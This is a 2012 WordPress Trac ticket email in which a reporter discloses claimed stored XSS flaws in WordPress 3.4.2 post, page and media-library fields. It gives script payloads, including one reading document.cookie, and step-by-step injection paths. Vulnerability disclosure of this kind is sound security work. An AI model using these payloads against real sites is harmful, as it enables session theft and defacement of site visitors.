[wp-trac] [WordPress Trac] #21917: Wordpress 3.4.2 - Multiple XSS Vulnerability

WordPress Trac wp-trac at lists.automattic.com
Tue Sep 18 04:36:29 UTC 2012


#21917: Wordpress 3.4.2 - Multiple XSS Vulnerability
-----------------------------+--------------------------
 Reporter:  nuxbie           |       Type:  defect (bug)
   Status:  new              |   Priority:  normal
Milestone:  Awaiting Review  |  Component:  General
  Version:  3.4.2            |   Severity:  normal
 Keywords:                   |
-----------------------------+--------------------------
 [ Wordpress 3.4.2 - Multiple XSS Vulnerability ]

 Hello, my name is Catur Febrian (nuxbie).
 I have bugs at new webapps wordpress (last version).
 This bugs is XSS (Cross Site Scripting).
 Wordpress 3.4.2 have a multiple vuln.
 1. XSS WP-Post.
 2. XSS WP-Page.
 3. XSS WP-MediaLibrary.

 Please, read my exploit report... :-)

 Exploit Title: CMS Wordpress - Multiple XSS Vulnerability
 Author       : TheCyberNuxbie [ Catur Febrian ]
 E-mail       : root at 31337sec.com
 Version CMS  : Version 3.4.2 (Last Version)
 Category     : WebApps / Content Management System (CMS)
 Security Risk: Medium Level
 Link Downlaod: http://www.wordpress.org/
 Tested On    : Mozilla Firefox + Xampp + Windows 7 x32 ID

 [ Information Content ]
 WordPress - Web Publishing Software.
 http://www.wordpress.org/

 [ Vulnerability Details ]
 1. XSS WP-Post.
 2. XSS WP-Page.
 3. XSS WP-MediaLibrary.

 [ XSS CODE ]
 <script>alert('31337');</script>
 <script>alert(document.cookie);</script>
 <script>window.open("http://www.google.com/")</script>

 - Exploit Report:
 1. Create / Edit WP-Post:
 Input "Title Post" with Script XSS.
 <script>alert('31337');</script>
 http://wordpress/wp-admin/post-new.php <--- Publish.
 View XSS: http://wordpress/?p=xxx <--- XSSed.
 PIC: http://31337sec.com/wordpress/xss-post1.jpg +
 http://31337sec.com/wordpress/xss-post2.jpg

 2. Create / Edit WP-Page:
 Input "Title Page" with Script XSS.
 <script>alert('31337');</script>
 http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
 View XSS: http://wordpress/?page_id=xxx <--- XSSed.
 PIC: http://31337sec.com/wordpress/xss-page1.jpg +
 http://31337sec.com/wordpress/xss-page2.jpg

 3. Add / Edit WP-Media Library:
 Upload files via Media Library.
 http://wordpress/wp-admin/media-new.php <--- Select File.
 Upload Files, Save...!!!
 Input Form "Title", "Caption", "Description" with Script XSS <--- Save All
 Changes.
 View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
 PIC: http://31337sec.com/wordpress/xss-media1.jpg +
 http://31337sec.com/wordpress/xss-media2.jpg +
 http://31337sec.com/wordpress/xss-media3.jpg

 - Script XSS will be affacted:
 1. Frontend Website (post).
 http://wordpress/?p=xxx <--- XSSed.
 2. Frontend Website (page).
 http://wordpress/?page_id=xxx <--- XSSed.
 3. Frontend Website (attachment).
 http://wordpress/?attachment_id=xxx <--- XSSed.

 Thanks...
 TheCyberNuxbie

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/21917>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software


More information about the wp-trac mailing list